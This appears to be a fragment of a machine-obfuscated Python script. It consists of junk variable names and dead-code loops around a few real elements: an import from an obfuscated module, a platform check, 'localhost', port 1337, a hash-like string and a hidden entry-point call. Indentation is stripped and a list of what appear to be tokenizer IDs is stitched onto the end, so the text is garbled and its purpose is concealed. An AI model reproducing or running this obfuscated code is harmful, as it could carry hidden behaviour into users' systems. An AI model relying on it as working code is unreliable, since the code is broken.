IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL:
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
from core.zMJIDSQBjssyEayGxDrxJGHzInFeSJvxzsGGSMSsCIHSEyiEAwPOFiAvyOoavMB import BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA, GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx
try:
luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG = 'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ'
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = 'JHnMUIJJzDAoOsXvEokGyCvBEtBIRXrCvBtISdhHHSNmprJrPPtnHxvlITPAjw'
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = 'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN'
qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr = 'RmBujycyGGlrBhsyFzTRmQjGSqENRSpTBsUIJCJvRDZvizFFztAxJRuPjvJoyPx'
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = 'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz'
DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr = 'POSmSiAvABGOYUXHQCbIMkYFOEBXIHGyIOPPjJHeHWHUyyuMirDSGUGIBDJDJEA'
GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx = [
'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ',
'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN',
'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz',
'uFFuUnxDtFEyzwmPMfXUvDksUDwQyqzwSITHJBRrFQjvvYRupIFEJeAORGnOBDB'
]
for luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG in DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr:
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX:
if qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr == vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG
elif vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx == nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
else:
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx:
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ
except Exception:
pass
except ImportError as GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = 'llzLJWoQkGzyxyEMTAiGFBrYPJVeyfSyyFHsxBnoulHsqHuwvwpLwUNGIJHPEtP'
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = 'tGwOEAyvIEJRHGtGfQHRyBSIIwGNezvJFHZOFtuFIswBlzqRvCQrvRSAMpnttEQ'
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = 'BSILrwBEqFQkIJQnDAIZXFptJoRqySDEAJIjJxyIvASQcCGvycjCFJwwQuINzJD'
wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL = 'jHBSHySpBDFYENyuHEAEaSCAfqupwwueyqnrFBDhpJvENIHJFnBAsAHWTvQXhuR'
UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE = 'sEJUWOIjxCAmPgznGsySvJGRMabExBodHSEpYAibNlHGtizyCzEvDySBMynDIPJ'
if vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
if vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL
elif vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG:
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT
if GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
print(GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR)
sys.exit(0)
nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ = sys.platform
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = 'GSFWuEAGpAwEklfuDJOHKOwEUzwHywxQAwGyjQIvErPvEwHzmzPBIoEywBPxDnD'
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = 'GDhDBJJCweBDssXFLvAuESSEyxRyhkDwpCuXRSWJqnGvMTAYRsTGRhOIEuGxPSu'
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = 'IvyEABRuRwIPLBAqCquBCHnHkkIBdYDmIrCDDTpPFAxAQltxusiTmuQERlPtCEz'
ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC = 'wGyHInFlnxGxXIhGZPEJSyPEJrDoNpVzANsPIyGrvGyHBGNJIAKBDBPZGHrrqHI'
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = 'ErBvASsGScEAQreHlMJFQJlDDmqDGsJOrHwsJVQgXSXiQSFGPHTNMGpieymHoCy'
xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW = 'vzNxwardqUroBkGVSRCupivMiFxsBzqSgSRvsrqGyyGDrGASQUGiJHCxClIJQqR'
if QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO != ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW != CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD
else:
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
if CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG == QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW == CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC = 'localhost'
RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG = 'XPnqyABHjboPmIHyJynQFQEExIGMwvRjrBBEtRlHklTFoIAyAPISuzEpJHFBvnZ'
uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX = 'hDmyQJfnfPLQsvHYrBwJHnBQKyQwRrQDYJJFEEiBAxrDSDTmBRLwjvDFAzstIzF'
hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE = 'JQtPSGuYgrxqIvOGxCGGcFCrFgFPRpXRzuHowHPHCyzGxBHSIMtwrEDBIDZzBRu'
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = 'pFRPrxMyBHwIsyexesMNaHoqyHPWonFpSBIAJGtDjFCFkAHESCHrHGuTiHsGgEB'
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = 'hSYYHPnSggRzIREQDQhRFEYQjAJEnIEBFtnJCRNwEJSnJRRvwGkBzXgcADdNkHO'
rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv = 'qCFzkFGQiBAYDJmvrHBCyRlrxlDwexJIPQtxRuIBFRDpIozeQIRDwHpJRxJIHmH'
if hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
for rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv in ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn:
if rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG
else:
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX
fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ = 1337
CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt = 'IOBSEEJLxPuJSpINpGHSqFuRGDWFHMbnJXDnGvMYGRymPTAGHHQQGNHsEhGozd'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
if CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT == sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT
else:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
CFRGQCPCzURSYHUgHlEFsBSnFqsWRJFJCLuvAijkNAfyFExtqWWAAuIDRGEQPsj = 'b14ce95fa4c33ac2803782d18341869f'
try:
ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw = 'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG'
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = 'CElERpyFSPuaRGkrCjStJgQQQtuoPCjCCSMrGmjFQZSGICVpBJVDHCqyOEDCOQE'
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = 'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU'
wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk = 'JBWBwJzDRqsEHuAqepJGIxDHZsPDPRpXiFHDBnHBsvzJPRHVSJAHEzsqJPQHQBx'
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = 'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ'
zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn = 'upyQIBBVSAnJraVqYzWvJGygDAuQkRVOIumwjGBHHmSJjAwHsqvRRICoMoRSzDi'
FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus = [
'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG',
'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU',
'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ',
'SztutxvJpQPSSAtDNrxDfTwWvHESskJxAhJBIeFJOCODlGoQFxPADJRzUMwmDyr'
]
for ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw in zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn:
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT:
if wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk == QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw
elif QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr == CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
else:
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus:
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG
except Exception:
pass
if __name__ == '__main__':
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = 'BiXAsAGtySJhFpAMxEfvysvhDOHCIyqIGlSAQPJOJoCzzYrZAmxtmwBAHRzzqpE'
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = 'oyFlgGRGBBzPuPHhPFACIQmEyDmjiGPXGqvPArPJsOlGQxSeuTvuJCCDmxAgIBu'
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = 'tDIjJGFQBIIIIkMGysIIxQJyHiSxgEqqVxJJmAHErtuSQIsyzoHRlAvUzSBJpHp'
tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA = 'JHsFpPPFvIwYxPxSJVGAZrpxCFEPZWJudnPFBulvYDDiRHPGquEBPPsEOFQtDOx'
gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS = 'JFAXHSRHPQEuQZHBXAHBXjAxHlzTwJEHEzlExSGfxGSlsdFyFwHYzymSNttHouI'
if QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
if vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA
elif vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ:
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx
if jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
37,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
796,
705,
49,
32457,
48,
591,
4760,
76,
3978,
84,
1929,
33,
41,
52,
457,
87,
53,
4669,
83,
9414,
11012,
2782,
38,
48,
32,
48,
85,
74,
50,
81,
38,
83,
12397,
20802,
77,
14313,
57,
